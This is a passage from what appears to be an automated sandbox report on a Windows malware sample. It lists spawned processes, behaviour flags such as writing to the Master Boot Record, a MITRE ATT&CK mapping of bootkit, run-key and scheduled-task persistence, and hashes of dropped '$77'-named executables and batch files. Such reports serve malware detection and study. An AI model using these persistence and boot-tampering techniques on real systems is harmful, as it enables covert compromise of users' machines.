  C:\Windows\system32\SppExtComObj.exe -Embedding
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exe (level 1)
  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
- Modifies data under HKEY_USERS
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe (level 1)
  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
- Modifies data under HKEY_USERS
-
C:\Windows\system32\DllHost.exe (level 1)
  C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
-
C:\Windows\system32\DllHost.exe (level 1)
  C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}
-
C:\Windows\system32\wbem\wmiprvse.exe (level 1)
  C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- Checks BIOS information in registry
- Writes to the Master Boot Record (MBR)
- Enumerates system info in registry
-
C:\Windows\System32\WaaSMedicAgent.exe (level 1)
  C:\Windows\System32\WaaSMedicAgent.exe 879d428bfc393a7980661c64eb6fdfe8 XlE41ATQV0aVT9QlSRxzIw.0.1.0.0.0
- Sets service image path in registry
- Modifies data under HKEY_USERS
-
C:\Windows\System32\Conhost.exe (level 2)
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
- Drops file in Windows directory
-
C:\Windows\servicing\TrustedInstaller.exe (level 1)
  C:\Windows\servicing\TrustedInstaller.exe
-
C:\Windows\system32\svchost.exe (level 1)
  C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Persistence
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Pre-OS Boot (1)
  - Bootkit (1)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (2)
  - Registry Run Keys / Startup Folder (2)
- Scheduled Task/Job (1)
  - Scheduled Task (1)
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-scchost.exe.log
  Filesize: 654B
  MD5: 2ff39f6c7249774be85fd60a8f9a245e
  SHA1: 684ff36b31aedc1e587c8496c02722c6698c1c4e
  SHA256: e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
  SHA512: 1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe
  Filesize: 66KB
  MD5: f10712f4faa374be8f37668c5ebed4a6
  SHA1: bb30e941c4f91ae3178539e993abecbfd838fdb0
  SHA256: d66c793c2e3290b3996b54f5a2fc2c1973fc41677ec46ce0e0e30aa4e7916acf
  SHA512: cb838ec3d65ca49bb25bd93e06666e6c2640c66fd0b68fc826ca763a3dedcc4d4033abab7cfca2fff3bf08ed98d14533abf19026fd9d1845dbf09fcb241840ac
-
C:\Users\Admin\AppData\Local\Temp\$77-install.exe
  Filesize: 163KB
  MD5: 1a7d1b5d24ba30c4d3d5502295ab5e89
  SHA1: 2d5e69cf335605ba0a61f0bbecbea6fc06a42563
  SHA256: b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5
  SHA512: 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa
-
C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe
  Filesize: 256KB
  MD5: 18f497deffe88b6b2cff336a277aface
  SHA1: 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e
  SHA256: 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5
  SHA512: 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d
-
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe
  Filesize: 50KB
  MD5: 77a71f3a441aa3bf824967e52413bec5
  SHA1: c3d6df5cfc5eefaadf9bcb3703484e3cadf79588
  SHA256: 1e6c87e492d90fbc4b9d2a16676a58735e33861f780c6c3020869337a0ccfc82
  SHA512: 31c413cb410b366b63f0e763e288c2795584f9c7fda41eeea45f7d32a853da87e3ab58a144ff02a75b1d1803c7fef9fe3d561133a50a4e600799ed6f9050fd5b
-
C:\Users\Admin\AppData\Local\Temp\tmp9F0F.tmp.bat
  Filesize: 155B
  MD5: 64066edfd8c8c9d8c6b0f9ad4d7e7b7b
  SHA1: c0e0caf9de83e7044baa3067e8ed0d6045fa91af
  SHA256: 97bef182a4f189659dc3f29b390d2982929a53363d52ed0ae538e5557ebe4275
  SHA512: 4539c27e7d19d92c6ae78eaed456b8884363a7b5b02e6555755785ccdd826fbd47712c04b1f176103eb6a4d2a89a0bccb0ebadd2005a116ea355eb51b5c098dd
-
C:\Windows\TEMP\tmpA9FB.tmp.bat
  Filesize: 163B
  MD5: 82cff771f5910f91493b9b5c0f51964a
  SHA1: acda34e036c3296d4eb456b84d5fc14dedfe750f
  SHA256: 6293b9d57282dbb904f2a942282302a7c8290f70a006430abd6d5ad26f81aba7
  SHA512: ed5445c39f53ee604ee2c8d8ee83a3787abf6f3e797f7ffefde85b9d7642f7bc072ad34e6a30c69df41b9e4a75ec9fa14aed7897ca9510f7d60797b25e4e202f
-
C:\Windows\Temp\__PSScriptPolicyTest_04qlnryp.xkw.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
memory/380-285-0x000001BAD9AB0000-0x000001BAD9ADB000-memory.dmp
  Filesize: 172KB
-
memory/380-291-0x000001BAD9AB0000-0x000001BAD9ADB000-memory.dmp
  Filesize: 172KB
-
memory/380-292-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
  Filesize: 64KB
-
memory/436-237-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
-
memory/436-247-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
-
memory/436-235-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
-
memory/436-241-0x00007FFBB6C70000-0x00007FFBB6D2E000-memory.dmp
  Filesize: 760KB
-
memory/436-240-0x00007FFBB6E90000-0x00007FFBB7085000-memory.dmp
  Filesize: 2.0MB
-
memory/436-239-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
-
memory/436-236-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
-
memory/436-234-0x0000000140000000-0x0000000140008000-memory.dmp
  Filesize: 32KB
-
memory/612-250-0x0000013971180000-0x00000139711A5000-memory.dmp
  Filesize: 148KB
-
memory/612-251-0x00000139711B0000-0x00000139711DB000-memory.dmp
  Filesize: 172KB
-
memory/612-252-0x00000139711B0000-0x00000139711DB000-memory.dmp
  Filesize: 172KB
-
memory/612-258-0x00000139711B0000-0x00000139711DB000-memory.dmp
  Filesize: 172KB
-
memory/612-259-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
  Filesize: 64KB
-
memory/668-270-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
  Filesize: 64KB
-
memory/668-264-0x000001CEE0E50000-0x000001CEE0E7B000-memory.dmp
  Filesize: 172KB
-
memory/668-269-0x000001CEE0E50000-0x000001CEE0E7B000-memory.dmp
  Filesize: 172KB
-
memory/732-296-0x00000127AE4F0000-0x00000127AE51B000-memory.dmp
  Filesize: 172KB
-
memory/952-280-0x00000226FBFD0000-0x00000226FBFFB000-memory.dmp
  Filesize: 172KB
-
memory/952-274-0x00000226FBFD0000-0x00000226FBFFB000-memory.dmp
  Filesize: 172KB
-
memory/952-281-0x00007FFB76F10000-0x00007FFB76F20000-memory.dmp
  Filesize: 64KB
-
memory/2840-233-0x00007FFBB6C70000-0x00007FFBB6D2E000-memory.dmp
  Filesize: 760KB
-
memory/2840-225-0x000001A81BB30000-0x000001A81BB52000-memory.dmp
  Filesize: 136KB
-
memory/2840-232-0x00007FFBB6E90000-0x00007FFBB7085000-memory.dmp
  Filesize: 2.0MB
-
memory/2840-231-0x000001A8344F0000-0x000001A83451A000-memory.dmp
  Filesize: 168KB
-
memory/2932-0-0x0000000074D2E000-0x0000000074D2F000-memory.dmp
  Filesize: 4KB
-
memory/2932-1104-0x0000000074D2E000-0x0000000074D2F000-memory.dmp
  Filesize: 4KB
-
memory/2932-1-0x0000000000620000-0x00000000018C0000-memory.dmp
  Filesize: 18.6MB
-
memory/3984-113-0x0000000000340000-0x0000000000352000-memory.dmp
  Filesize: 72KB
-
memory/3984-65-0x00007FFB974D3000-0x00007FFB974D5000-memory.dmp
  Filesize: 8KB
-
memory/4280-219-0x00000000010B0000-0x00000000010B6000-memory.dmp
  Filesize: 24KB
-
memory/4280-208-0x00000000007C0000-0x0000000000806000-memory.dmp
  Filesize: 280KB
-
memory/4576-127-0x0000000000A30000-0x0000000000A46000-memory.dmp
  Filesize: 88KB